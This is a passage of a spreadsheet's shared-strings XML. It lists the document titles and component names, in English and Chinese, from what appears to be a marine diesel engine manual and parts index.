    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6645-0140 Running</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6645-0150 Prep PRIOR arr in Port</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6645-0160 Stopping</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6645-0170 Prep AFTER arr in Port</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6645-0181 Engine Ctrl Syst. ME-B</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6645-0190 MOP Description</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6645-0240 Alarm Handling on MOP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6645-0250 Engine Operation</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6645-0260 Auxilliaries</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6645-0270 Maintenance</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6645-0280 Admin</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6645-0290 Fire in Scav. Air Box</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6645-0300 Ignition in Crankcase</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6645-0310 Turbocharger Surging</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6645-0320 Run. with cyl. or turb</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6645-0330 Run. with Cracked Stud</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6655-0115 Seq. Diagram FPP Plant</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6655-0120 Seq. Diagram CPP Plant</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6655-0125 MOP Overview</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6655-0130 MOP Alarm List</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6655-0135 MOP AEvent Log</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6655-0140 MOP Manual Cut-Out Lis</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6655-0145 MOP Channel List</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6655-0150 MOP Operation</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6655-0160 MOP Process Informatio</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6655-0166 MOP Max Pressure Offse</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6655-0171 MOP Mean Pressure</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6655-0175 MOP Hydraulic System</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6655-0185 MOP Cylinder Lubricato</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6655-0190 MOP System View I/O Te</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6655-0195 MOP Invalidated Inputs</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6655-0200 MOP network Status</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6655-0201 MOP Tacho Cabling</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6655-0202 MOP Tacho Tests</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6655-0205 MOP Set Time</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6655-0210 MOP Version</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6655-0215 Cut. Cyl. Out Of Actio</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6655-0220 Cut. Tur. Out Of Actio</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6655-0225 Turbocharger Surging</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6645-0180 Eng ConSys ME/ME-C eng</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6645-0200 Eng ConSys FPP MC eng</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6645-0210 Eng ConSys CPP MC eng</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6645-0220 Eng ConSys FPP MC/MC-C</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6645-0230 CrashStop FPP/Rev CPP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6645-0182 Trouble Shooting</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6645-0155 Unload and stop of Eng</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6645-0175 Op. after stop of Eng</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6645-0185 Recom use of Aux Equip</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6645-0195 Eng ConSys MC-S eng</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6645-0196 Op. MC-S, FO/Water mix</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6655-0100 Man Con from ESC Cons</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6655-0105 Ch. over Norm-Man Con</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6655-0110 Manoeuvring Gear</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6655-0155 MOP Status</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6655-0165 MOP Cylinder Load</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6655-0170 MOP Cylinder Pressure</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6655-0180 MOP Scavenge Air</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6655-0101 R/M STOP/START safesys</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6655-0106 Seq. Dia. starting</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6655-0111 Seq. Dia. loading</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6645-0340 ME man ctrl from LOP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6655-0132 MOP Attention List</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6655-0161  MOP Process Adjustm.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6655-0162 MOP Chief Limiters</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6645-0241 Alarm Reference List</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6655-0203 MOP Function Test</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6655-0204 MOP Trouble Shooting</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6640-010 Operation</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>7072-1100 Angle Encoder</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>7072-0800 PMI System</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>7072-1200 Tacho Pick-Ups</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>7072-0110 Man. Side Ctrl Console</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>7065-1100 Angle Encoder</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>7065-1101 Angle Encoder</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>- error in no transfer - /DNN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>7072-1250 Trigger Ring</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>7045-0100 Guidance Value Automat</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>7045-0200 Instrumentation</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>7055-0150 Engine Ctrl System Dia</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>7055-0155 Diagram Manoevering Sy</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>7055-0100 ECR. STOP, SafeSys CPP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>7055-0105 ECR. START, AH, AS CPP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>7055-0110 ESC. STOP START, CPP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>7055-0120 Bridge Con Restart Eng</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>7055-0125 RC STOP START SafeSys</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>7055-0130 ESC cons, STOP, START</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>7055-0135 ECR. STOP, SafeSys FPP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>7055-0140 ECR. START, AH, AS FPP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>7055-0145 ESC. STOP START, FPP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>7055-0115 Ctrl Room Safety Syste</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>7065-1200 Pick-up Arrang. Data</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>7065-1201 Pick-up Arrangement</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>7670-0600 Working PlatforMS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>7665-0100 Hydraulic Tools</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>7665-0600 Working Platform</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>7665-0601 Working Platform</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>7665-0201 Stand.Tighening torque</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>7665-0301 Torque spanner</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>7665-0401 Tighening gauge</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>7665-0501 Screws and Nuts</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>7670-0310 TRAVELLING TROL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>7670-0100 Hydraulic Tools</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>7670-0410 Instruments</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>7670-0240 Ring Slugging Spanner</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>7670-0200 Torque Spanners</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>7670-0400 Pliers</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>7670-0210 Open-Ended Spanners</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>7670-0300 Lifting Tools</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>7670-0250 MISCELLANEOUS S</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>7670-0260 OPEN-ENDED SPAN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>7670-0230 COMBINATION SPA</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>7665-0101 Hydraulic Tools</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>7665-0901 Lubricating Procedures</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>7670-0220 Open End. Slugg. Span.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>7670-0221 Open End. Slugg. Span.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>7640-0100 Tools</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>7670-0610 Ladder</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>7670-0110 Hydraulic Jack</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>7972-2200 Kit for Exhaust Valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>7972-0500 Kit for Fuel Pump</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>7940-0100 Spare Parts</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>8240-0100 Installation</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>8840-0100 Service Info</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>9140-0100 Sub Supplier's Info</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Sterntube, coupling flange</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HUB/SHAFT, blades, extern</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Zero pitch</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Front end OD unit</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>External instruments</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Tacho sensor</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>External control equipment</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Flow sensors</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Aut.shut down of engine</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Specifik Spare parts</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>5161984-6.15</t>
  </si>
  <si>
    <t>1072-0710-0021.0</t>
  </si>
  <si>
    <t>EN51P1665</t>
  </si>
  <si>
    <t>ELECTRIC PARTS WELDING</t>
  </si>
  <si>
    <t>CABLE SUPPORT</t>
  </si>
  <si>
    <t>W1-4WC012</t>
  </si>
  <si>
    <t>DIATANCE PIECE</t>
  </si>
  <si>
    <t>107.353.550.001</t>
  </si>
  <si>
    <t>4270-0010-0043.0</t>
  </si>
  <si>
    <t>HEATING TANK FOR CYL LUB OIL</t>
  </si>
  <si>
    <t>HEATING TANK CONTROL BOX</t>
  </si>
  <si>
    <t>B6000035</t>
  </si>
  <si>
    <t>1472-0310 ConRod, Compr. Shim</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EN8AT20.1</t>
  </si>
  <si>
    <t>FUEL OIL PIPE, INLET - OUTL</t>
  </si>
  <si>
    <t>BALL VALVE, WELDED CONNEC</t>
  </si>
  <si>
    <t>5258250-2.1</t>
  </si>
  <si>
    <t>NAMEPLATE FOR HCU AND OMD</t>
  </si>
  <si>
    <t>B60Z1032</t>
  </si>
  <si>
    <t>NAMEPLATE FOR SOLENOID VALVE</t>
  </si>
  <si>
    <t>B60Z1031</t>
  </si>
  <si>
    <t>NAMEPLATES OF VALVE</t>
  </si>
  <si>
    <t>B60Z0044A</t>
  </si>
  <si>
    <t>1072-0630 Frame Box, deta</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>1072-0710 Cylinder Frame,</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机数据</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管系基本标识</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机操作面板布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压泵控制箱</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动泵</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机液压油滤器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承座</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中间部分焊接图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承座</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力块部分焊接图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承座</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>尾端焊接图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承顶部间隙</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油封</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞冷却油泄放管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力轴承</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>刮油环腔</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>下部</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油嘴</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀安装组件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压起动泵</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压供应组件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压泵</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带法兰电机</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮箱</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>摩擦轴试验规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高压泵</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压动力供应</t>
    </r>
  </si>
  <si>
    <r>
      <t>ME</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>临时滤器生产规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>比例阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滤器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮箱管系</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压管总成</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压软管安装规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>蓄压器首次生产规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>适配器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>球座</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弯头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>法兰</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>蝶阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>橡胶膨胀节</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>布线</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电气仪器仪表</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制箱布线</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸控制布线</t>
    </r>
  </si>
  <si>
    <r>
      <t>PMI</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>布线</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸润滑器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀上部管系</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器管系</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主起动空气管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动空气分配器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制空气系统</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>块夹</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器冷却水管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器清洗管系</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
